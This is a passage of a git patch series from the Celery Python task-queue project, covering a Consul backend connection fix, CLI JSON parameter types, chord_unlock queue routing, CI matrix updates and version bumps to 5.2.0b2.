-For example if the client imports the module ``"myapp.tasks"``
-as ``".tasks"``, and the worker imports the module as ``"myapp.tasks"``,
-the generated names won't match and an :exc:`~@NotRegistered` error will
-be raised by the worker.
-
-This is also the case when using Django and using ``project.myapp``-style
-naming in ``INSTALLED_APPS``:
-
-.. code-block:: python
-
- INSTALLED_APPS = ['project.myapp']
-
-If you install the app under the name ``project.myapp`` then the
-tasks module will be imported as ``project.myapp.tasks``,
-so you must make sure you always import the tasks using the same name:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask # << GOOD
-
- >>> from myapp.tasks import mytask # << BAD!!!
-
-The second example will cause the task to be named differently
-since the worker and the client imports the modules under different names:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask
- >>> mytask.name
- 'project.myapp.tasks.mytask'
-
- >>> from myapp.tasks import mytask
- >>> mytask.name
- 'myapp.tasks.mytask'
-
-For this reason you must be consistent in how you
-import modules, and that is also a Python best practice.
-
-Similarly, you shouldn't use old-style relative imports:
-
-.. code-block:: python
-
- from module import foo # BAD!
-
- from proj.module import foo # GOOD!
-
-New-style relative imports are fine and can be used:
-
-.. code-block:: python
-
- from .module import foo # GOOD!
-
-If you want to use Celery with a project already using these patterns
-extensively and you don't have the time to refactor the existing code
-then you can consider specifying the names explicitly instead of relying
-on the automatic naming:
-
-.. code-block:: python
-
- @app.task(name='proj.tasks.add')
- def add(x, y):
- return x + y
-
.. _task-name-generator-info:
Changing the automatic naming behavior
From b25123584a51ef34acd7a48d037a3b56f72699ff Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Mon, 9 Aug 2021 11:07:57 -0300
Subject: [PATCH 034/177] Adjust sphinx settings
Change the deprecated ":show-nested:" config setting in favor of ":nested:",
as required by the sphinx-click 2.5.0 version in use.
Remove empty page "celery.bin.amqp.html" ("celery.bin.amqp" only now
has click documentation shown in "reference/cli.html").
Relates: #6902 #6905
---
docs/reference/celery.bin.amqp.rst | 11 -----------
docs/reference/cli.rst | 2 +-
2 files changed, 1 insertion(+), 12 deletions(-)
delete mode 100644 docs/reference/celery.bin.amqp.rst
diff --git a/docs/reference/celery.bin.amqp.rst b/docs/reference/celery.bin.amqp.rst
deleted file mode 100644
index 8de8bf00de7..00000000000
--- a/docs/reference/celery.bin.amqp.rst
+++ /dev/null
@@ -1,11 +0,0 @@
-===========================================================
- ``celery.bin.amqp``
-===========================================================
-
-.. contents::
- :local:
-.. currentmodule:: celery.bin.amqp
-
-.. automodule:: celery.bin.amqp
- :members:
- :undoc-members:
diff --git a/docs/reference/cli.rst b/docs/reference/cli.rst
index cff2291d4ed..6432b7e300a 100644
--- a/docs/reference/cli.rst
+++ b/docs/reference/cli.rst
@@ -4,4 +4,4 @@
.. click:: celery.bin.celery:celery
:prog: celery
- :show-nested:
+ :nested: full
From 6405ebc62348d4c1c48334cd4dff5e21233bea2f Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Thu, 5 Aug 2021 15:15:10 -0300
Subject: [PATCH 035/177] Allow using non-true values in app kwargs
Trying to instantiate a Celery app with non-true kwargs will not work
for those configs which have True as their default; for example,
this will have no effect:
>>> app = Celery(task_create_missing_queues=False)
>>> app.conf['task_create_missing_queues']
True
This fix changes the filtering so that, from now on, only
None values are discarded.
Fixes: #6865
---
celery/app/base.py | 2 +-
t/unit/app/test_app.py | 6 +++++-
2 files changed, 6 insertions(+), 2 deletions(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index f9ac8c18818..3df9577dbe1 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -323,7 +323,7 @@ def on_init(self):
"""Optional callback called at init."""
def __autoset(self, key, value):
- if value:
+ if value is not None:
self._preconf[key] = value
self._preconf_set_by_auto.add(key)
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 33b34c00dae..215e200dd45 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -274,7 +274,11 @@ def test_with_broker(self, patching):
with self.Celery(broker='foo://baribaz') as app:
assert app.conf.broker_url == 'foo://baribaz'
- def test_pending_confugration__kwargs(self):
+ def test_pending_configuration_non_true__kwargs(self):
+ with self.Celery(task_create_missing_queues=False) as app:
+ assert app.conf.task_create_missing_queues is False
+
+ def test_pending_configuration__kwargs(self):
with self.Celery(foo='bar') as app:
assert app.conf.foo == 'bar'
From e963ba6a295dadcff746e8f64fd5c98a1c65231f Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 9 Aug 2021 16:28:02 +0000
Subject: [PATCH 036/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.23.1 → v2.23.3](https://github.com/asottile/pyupgrade/compare/v2.23.1...v2.23.3)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 705d6f859ae..4781a27634d 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.23.1
+ rev: v2.23.3
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 994ced05da08cf152454322a67331ac2da953fae Mon Sep 17 00:00:00 2001
From: ShaheedHaque
Date: Wed, 11 Aug 2021 10:50:59 +0100
Subject: [PATCH 037/177] The Consul backend must correctly associate requests
and responses (#6823)
* As per #5605, the Consul backend does not cleanly associate each response
from Consul with the outbound Celery request that caused it. This leaves
it prone to mistaking the (final) response from an operation N as the
response to an (early) part of operation N + 1.
This change fixes that by using a separate connection for each request.
That of course has the downside of (a) being relatively expensive and (b)
increasing the rate of connection requests into Consul:
- The former is annoying, but at least the backend works reliably.
- The latter can cause Consul to reject excessive connection attempts, but
if it does, at least it returns a clear indication of this (IIRC, it
responds with an HTTP 429 "too many connections" indication).
Additionally, this issue can be ameliorated by enabling retries in
python-consul2 (which I believe should be turned on regardless, to handle
transient network issues). This is addressed by the PR at
https://github.com/poppyred/python-consul2/pull/31.
Note that we have never seen (b) outside a test specifically trying to hammer
the system, but we see (a) all the time in our normal system tests.
To opt-out from the new behaviour add a parameter "one_client=1" to the
connection URL.
* Increase code coverage.
* Rewrite Consul backend documentation, and describe the options now
available.
---
celery/backends/consul.py | 40 ++++++++++++++++++---------
docs/userguide/configuration.rst | 46 +++++++++++++++++++++++++++++---
t/unit/backends/test_consul.py | 15 +++++++++--
3 files changed, 83 insertions(+), 18 deletions(-)
diff --git a/celery/backends/consul.py b/celery/backends/consul.py
index 106953a1271..a4ab148469c 100644
--- a/celery/backends/consul.py
+++ b/celery/backends/consul.py
@@ -31,7 +31,6 @@ class ConsulBackend(KeyValueStoreBackend):
supports_autoexpire = True
- client = None
consistency = 'consistent'
path = None
@@ -40,15 +39,33 @@ def __init__(self, *args, **kwargs):
if self.consul is None:
raise ImproperlyConfigured(CONSUL_MISSING)
-
+ #
+ # By default, for correctness, we use a client connection per
+ # operation. If set, self.one_client will be used for all operations.
+ # This provides for the original behaviour to be selected, and is
+ # also convenient for mocking in the unit tests.
+ #
+ self.one_client = None
self._init_from_params(**parse_url(self.url))
def _init_from_params(self, hostname, port, virtual_host, **params):
logger.debug('Setting on Consul client to connect to %s:%d',
hostname, port)
self.path = virtual_host
- self.client = consul.Consul(host=hostname, port=port,
- consistency=self.consistency)
+ self.hostname = hostname
+ self.port = port
+ #
+ # Optionally, allow a single client connection to be used to reduce
+ # the connection load on Consul by adding a "one_client=1" parameter
+ # to the URL.
+ #
+ if params.get('one_client', None):
+ self.one_client = self.client()
+
+ def client(self):
+ return self.one_client or consul.Consul(host=self.hostname,
+ port=self.port,
+ consistency=self.consistency)
def _key_to_consul_key(self, key):
key = bytes_to_str(key)
@@ -58,7 +75,7 @@ def get(self, key):
key = self._key_to_consul_key(key)
logger.debug('Trying to fetch key %s from Consul', key)
try:
- _, data = self.client.kv.get(key)
+ _, data = self.client().kv.get(key)
return data['Value']
except TypeError:
pass
@@ -84,17 +101,16 @@ def set(self, key, value):
logger.debug('Trying to create Consul session %s with TTL %d',
session_name, self.expires)
- session_id = self.client.session.create(name=session_name,
- behavior='delete',
- ttl=self.expires)
+ client = self.client()
+ session_id = client.session.create(name=session_name,
+ behavior='delete',
+ ttl=self.expires)
logger.debug('Created Consul session %s', session_id)
logger.debug('Writing key %s to Consul', key)
- return self.client.kv.put(key=key,
- value=value,
- acquire=session_id)
+ return client.kv.put(key=key, value=value, acquire=session_id)
def delete(self, key):
key = self._key_to_consul_key(key)
logger.debug('Removing key %s from Consul', key)
- return self.client.kv.delete(key)
+ return self.client().kv.delete(key)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index e225eb1fe76..68207482b8e 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -2016,14 +2016,52 @@ without any further configuration. For larger clusters you could use NFS,
Consul K/V store backend settings
---------------------------------
-The Consul backend can be configured using a URL, for example:
+.. note::
+
+ The Consul backend requires the :pypi:`python-consul2` library:
+
+ To install this package use :command:`pip`:
+
+ .. code-block:: console
+
+ $ pip install python-consul2
+
+The Consul backend can be configured using a URL, for example::
CELERY_RESULT_BACKEND = 'consul://localhost:8500/'
-The backend will storage results in the K/V store of Consul
-as individual keys.
+or::
+
+ result_backend = 'consul://localhost:8500/'
+
+The backend will store results in the K/V store of Consul
+as individual keys. The backend supports auto expire of results using TTLs in
+Consul. The full syntax of the URL is::
+
+ consul://host:port[?one_client=1]
+
+The URL is formed out of the following parts:
+
+* ``host``
+
+ Host name of the Consul server.
+
+* ``port``
+
+ The port the Consul server is listening to.
+
+* ``one_client``
+
+ By default, for correctness, the backend uses a separate client connection
+ per operation. In cases of extreme load, the rate of creation of new
+ connections can cause HTTP 429 "too many connections" error responses from
+ the Consul server when under load. The recommended way to handle this is to
+ enable retries in ``python-consul2`` using the patch at
+ https://github.com/poppyred/python-consul2/pull/31.
-The backend supports auto expire of results using TTLs in Consul.
+ Alternatively, if ``one_client`` is set, a single client connection will be
+ used for all operations instead. This should eliminate the HTTP 429 errors,
+ but the storage of results in the backend can become unreliable.
.. _conf-messaging:
diff --git a/t/unit/backends/test_consul.py b/t/unit/backends/test_consul.py
index 4e13ab9d8a5..61fb5d41afd 100644
--- a/t/unit/backends/test_consul.py
+++ b/t/unit/backends/test_consul.py
@@ -22,10 +22,21 @@ def test_consul_consistency(self):
def test_get(self):
index = 100
data = {'Key': 'test-consul-1', 'Value': 'mypayload'}
- self.backend.client = Mock(name='c.client')
- self.backend.client.kv.get.return_value = (index, data)
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.get.return_value = (index, data)
assert self.backend.get(data['Key']) == 'mypayload'
+ def test_set(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59'
+ self.backend.one_client.kv.put.return_value = True
+ assert self.backend.set('Key', 'Value') is True
+
+ def test_delete(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.delete.return_value = True
+ assert self.backend.delete('Key') is True
+
def test_index_bytes_key(self):
key = 'test-consul-2'
assert self.backend._key_to_consul_key(key) == key
From 04771d65597f62ccf2f9d901c0d1f7c1d0f24d42 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 11 Aug 2021 16:59:17 +0300
Subject: [PATCH 038/177] =?UTF-8?q?Bump=20version:=205.1.2=20=E2=86=92=205?=
=?UTF-8?q?.2.0b1?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 2f0f5ef58af..66f73487a30 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.1.2
+current_version = 5.2.0b1
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index a4f05abf96d..462f53ce29c 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.1.2 (sun-harmonics)
+:Version: 5.2.0b1 (sun-harmonics)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.1.2 runs on,
+Celery version 5.2.0b1 runs on,
- Python (3.6, 3.7, 3.8, 3.9)
- PyPy3.6 (7.6)
@@ -89,7 +89,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.1.2 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b1 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index cc6b3dca870..9dc6c3ce484 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'sun-harmonics'
-__version__ = '5.1.2'
+__version__ = '5.2.0b1'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 56eba4c83d6..600b48da6a9 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.1.2 (cliffs)
+:Version: 5.2.0b1 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From e6b1c67f05e6941dcb160e951ee4ce21c885ef19 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Sat, 14 Aug 2021 10:56:12 +0100
Subject: [PATCH 039/177] Test windows on py3.10rc1 and pypy3.7 (#6868)
* test on Windows with py3.9+
* skip couchbase on python win32 >= 3.10
* temporarily disable rust on win pypy
* fix couchbase conditional syntax
* fix rust condition
* continue ignoring pypy on windows for now
* remove redundant passenv
* skip eventlet tests on windows 3.9+
* eventlet hangs on 3.6+ windows
* cryptography now has pypy3.7 wheels
* upgrade to rc py3.10
* add trove classifier for py3.10
* bump timeout for pypy
---
.github/workflows/python-package.yml | 11 +++--------
requirements/extras/couchbase.txt | 2 +-
setup.py | 1 +
t/unit/backends/test_asynchronous.py | 5 +++++
4 files changed, 10 insertions(+), 9 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 8ab6c68e6c5..41b525ca2cb 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,16 +24,11 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy-3.6', 'pypy-3.7']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.6', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- - os: windows-2019
- python-version: 'pypy-3.7'
- os: windows-2019
python-version: 'pypy-3.6'
- - os: windows-2019
- python-version: "3.10.0-beta.4"
- continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
@@ -64,8 +59,8 @@ jobs:
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
- timeout-minutes: 15
- run: >
+ timeout-minutes: 20
+ run: |
tox --verbose --verbose
- uses: codecov/codecov-action@v1
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index f72a0af01d4..a86b71297ab 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy'
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
diff --git a/setup.py b/setup.py
index 9022141035e..7a760178a65 100644
--- a/setup.py
+++ b/setup.py
@@ -192,6 +192,7 @@ def run_tests(self):
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Operating System :: OS Independent"
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index df25a683bc3..c0fe894900a 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -1,5 +1,6 @@
import os
import socket
+import sys
import threading
import time
from unittest.mock import Mock, patch
@@ -141,6 +142,10 @@ def test_drain_timeout(self):
assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval'
+@pytest.mark.skipif(
+ sys.platform == "win32",
+ reason="hangs forever intermittently on windows"
+)
class test_EventletDrainer(DrainerTests):
@pytest.fixture(autouse=True)
def setup_drainer(self):
From 38a645ddf13edfb1f630f54ba9fb6f7868ffbe01 Mon Sep 17 00:00:00 2001
From: MelnykR
Date: Sun, 15 Aug 2021 20:19:56 +0300
Subject: [PATCH 040/177] Route chord_unlock task to the same queue as chord
body (#6896)
* Route chord_unlock task to the same queue as chord body
* fix existing tests
* add case to cover bugfix
---
celery/backends/base.py | 6 ++++++
t/unit/backends/test_base.py | 14 ++++++++++++--
2 files changed, 18 insertions(+), 2 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 6c046028c57..91327ea2190 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -646,6 +646,12 @@ def fallback_chord_unlock(self, header_result, body, countdown=1,
body_type = None
queue = body.options.get('queue', getattr(body_type, 'queue', None))
+
+ if queue is None:
+ # fallback to default routing if queue name was not
+ # explicitly passed to body callback
+ queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name
+
priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 5d04e8a7d03..9023dc14e57 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -206,7 +206,17 @@ def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
self.b.apply_chord(header_result_args, body)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'testcelery'
+
+ routing_queue = Mock()
+ routing_queue.name = "routing_queue"
+ self.app.amqp.router.route = Mock(return_value={
+ "queue": routing_queue
+ })
+ self.b.apply_chord(header_result_args, body)
+ assert self.app.amqp.router.route.call_args[0][1] == body.name
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs["queue"] == "routing_queue"
self.b.apply_chord(header_result_args, body.set(queue='test_queue'))
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
@@ -228,7 +238,7 @@ def callback_different_app(result):
callback_different_app_signature = self.app.signature('callback_different_app')
self.b.apply_chord(header_result_args, callback_different_app_signature)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'routing_queue'
callback_different_app_signature.set(queue='test_queue_three')
self.b.apply_chord(header_result_args, callback_different_app_signature)
From 8bff3073cb58326f75d3194a04c5e089ee7abe97 Mon Sep 17 00:00:00 2001
From: InvalidInterrupt
Date: Tue, 17 Aug 2021 03:15:55 -0700
Subject: [PATCH 041/177] Add message properties to app.tasks.Context (#6818)
* celery.worker.request.Request needs to shallow copy headers to avoid
creating a circular reference when inserting properties
---
CONTRIBUTORS.txt | 1 +
celery/app/task.py | 1 +
celery/worker/request.py | 4 +++-
docs/userguide/tasks.rst | 5 +++++
t/integration/tasks.py | 5 +++++
t/integration/test_tasks.py | 8 +++++++-
6 files changed, 22 insertions(+), 2 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 9a1f42338e8..fa80335e9c9 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -281,5 +281,6 @@ Frazer McLean, 2020/09/29
Henrik Bruåsdal, 2020/11/29
Tom Wojcik, 2021/01/24
Ruaridh Williamson, 2021/03/09
+Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
diff --git a/celery/app/task.py b/celery/app/task.py
index 88f34889255..06366d73ed1 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -85,6 +85,7 @@ class Context:
loglevel = None
origin = None
parent_id = None
+ properties = None
retries = 0
reply_to = None
root_id = None
diff --git a/celery/worker/request.py b/celery/worker/request.py
index c30869bddbf..59bf143feac 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -93,7 +93,8 @@ def __init__(self, message, on_ack=noop,
maybe_make_aware=maybe_make_aware,
maybe_iso8601=maybe_iso8601, **opts):
self._message = message
- self._request_dict = message.headers if headers is None else headers
+ self._request_dict = (message.headers.copy() if headers is None
+ else headers.copy())
self._body = message.body if body is None else body
self._app = app
self._utc = utc
@@ -157,6 +158,7 @@ def __init__(self, message, on_ack=noop,
'redelivered': delivery_info.get('redelivered'),
}
self._request_dict.update({
+ 'properties': properties,
'reply_to': properties.get('reply_to'),
'correlation_id': properties.get('correlation_id'),
'hostname': self._hostname,
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 60e2acf7f9d..0fb1f2463aa 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -372,6 +372,11 @@ The request defines the following attributes:
current task. If using version one of the task protocol the chain
tasks will be in ``request.callbacks`` instead.
+.. versionadded:: 5.2
+
+:properties: Mapping of message properties received with this task message
+ (may be :const:`None` or :const:`{}`)
+
Example
-------
diff --git a/t/integration/tasks.py b/t/integration/tasks.py
index 8d1119b6302..c8edb01d977 100644
--- a/t/integration/tasks.py
+++ b/t/integration/tasks.py
@@ -306,6 +306,11 @@ def return_priority(self, *_args):
return "Priority: %s" % self.request.delivery_info['priority']
+@shared_task(bind=True)
+def return_properties(self):
+ return self.request.properties
+
+
class ClassBasedAutoRetryTask(Task):
name = 'auto_retry_class_task'
autoretry_for = (ValueError,)
diff --git a/t/integration/test_tasks.py b/t/integration/test_tasks.py
index c7c41214e54..5596e2986bf 100644
--- a/t/integration/test_tasks.py
+++ b/t/integration/test_tasks.py
@@ -9,7 +9,8 @@
from .conftest import get_active_redis_channels
from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add,
add_ignore_result, add_not_typed, fail, print_unicode,
- retry, retry_once, retry_once_priority, sleeping)
+ retry, retry_once, retry_once_priority, return_properties,
+ sleeping)
TIMEOUT = 10
@@ -270,6 +271,11 @@ def test_unicode_task(self, manager):
timeout=TIMEOUT, propagate=True,
)
+ @flaky
+ def test_properties(self, celery_session_worker):
+ res = return_properties.apply_async(app_id="1234")
+ assert res.get(timeout=TIMEOUT)["app_id"] == "1234"
+
class tests_task_redis_result_backend:
def setup(self, manager):
From cd283b6228f69a5dc0d4d3f06c6c9ec308f6fc5f Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 17 Aug 2021 13:34:33 +0100
Subject: [PATCH 042/177] handle already converted LogLevel and JSON (#6915)
* handle already converted LogLevel
* also handle JSON convert
---
celery/bin/base.py | 43 ++++++++++++++++++++++++++++++++++++++-----
celery/bin/call.py | 9 +++++----
2 files changed, 43 insertions(+), 9 deletions(-)
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 95af1a89316..30358dd8a9a 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -1,5 +1,6 @@
"""Click customizations for Celery."""
import json
+import numbers
from collections import OrderedDict
from functools import update_wrapper
from pprint import pformat
@@ -193,17 +194,45 @@ def convert(self, value, param, ctx):
return text.str_to_list(value)
-class Json(ParamType):
- """JSON formatted argument."""
+class JsonArray(ParamType):
+ """JSON formatted array argument."""
- name = "json"
+ name = "json array"
def convert(self, value, param, ctx):
+ if isinstance(value, list):
+ return value
+
try:
- return json.loads(value)
+ v = json.loads(value)
except ValueError as e:
self.fail(str(e))
+ if not isinstance(v, list):
+ self.fail(f"{value} was not an array")
+
+ return v
+
+
+class JsonObject(ParamType):
+ """JSON formatted object argument."""
+
+ name = "json object"
+
+ def convert(self, value, param, ctx):
+ if isinstance(value, dict):
+ return value
+
+ try:
+ v = json.loads(value)
+ except ValueError as e:
+ self.fail(str(e))
+
+ if not isinstance(v, dict):
+ self.fail(f"{value} was not an object")
+
+ return v
+
class ISO8601DateTime(ParamType):
"""ISO 8601 Date Time argument."""
@@ -242,12 +271,16 @@ def __init__(self):
super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL'))
def convert(self, value, param, ctx):
+ if isinstance(value, numbers.Integral):
+ return value
+
value = value.upper()
value = super().convert(value, param, ctx)
return mlevel(value)
-JSON = Json()
+JSON_ARRAY = JsonArray()
+JSON_OBJECT = JsonObject()
ISO8601 = ISO8601DateTime()
ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat()
LOG_LEVEL = LogLevel()
diff --git a/celery/bin/call.py b/celery/bin/call.py
index 35ca34e3f33..a04651bdd4f 100644
--- a/celery/bin/call.py
+++ b/celery/bin/call.py
@@ -1,8 +1,9 @@
"""The ``celery call`` program used to send tasks from the command-line."""
import click
-from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON, CeleryCommand,
- CeleryOption, handle_preload_options)
+from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY,
+ JSON_OBJECT, CeleryCommand, CeleryOption,
+ handle_preload_options)
@click.command(cls=CeleryCommand)
@@ -10,14 +11,14 @@
@click.option('-a',
'--args',
cls=CeleryOption,
- type=JSON,
+ type=JSON_ARRAY,
default='[]',
help_group="Calling Options",
help="Positional arguments.")
@click.option('-k',
'--kwargs',
cls=CeleryOption,
- type=JSON,
+ type=JSON_OBJECT,
default='{}',
help_group="Calling Options",
help="Keyword arguments.")
From 12f68d911d7fc50e48afd5483633f4e14d8a72df Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 17 Aug 2021 17:23:53 +0300
Subject: [PATCH 043/177] 5.2 is codenamed dawn-chorus.
---
README.rst | 4 ++--
celery/__init__.py | 2 +-
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.rst b/README.rst
index 462f53ce29c..90603158407 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b1 (sun-harmonics)
+:Version: 5.2.0b1 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -105,7 +105,7 @@ getting started tutorials:
.. _`Next steps`:
http://docs.celeryproject.org/en/latest/getting-started/next-steps.html
-
+
You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery.
Celery is...
diff --git a/celery/__init__.py b/celery/__init__.py
index 9dc6c3ce484..df89bf8936f 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -15,7 +15,7 @@
# Lazy loading
from . import local
-SERIES = 'sun-harmonics'
+SERIES = 'dawn-chorus'
__version__ = '5.2.0b1'
__author__ = 'Ask Solem'
From 2ac331026fab3d40ba1b2d106058356c30b48cb6 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 17 Aug 2021 17:34:33 +0300
Subject: [PATCH 044/177] =?UTF-8?q?Bump=20version:=205.2.0b1=20=E2=86=92?=
=?UTF-8?q?=205.2.0b2?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 66f73487a30..90de144c22e 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0b1
+current_version = 5.2.0b2
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 90603158407..ac0f3e31150 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b1 (dawn-chorus)
+:Version: 5.2.0b2 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0b1 runs on,
+Celery version 5.2.0b2 runs on,
- Python (3.6, 3.7, 3.8, 3.9)
- PyPy3.6 (7.6)
@@ -89,7 +89,7 @@ Get Started
===========
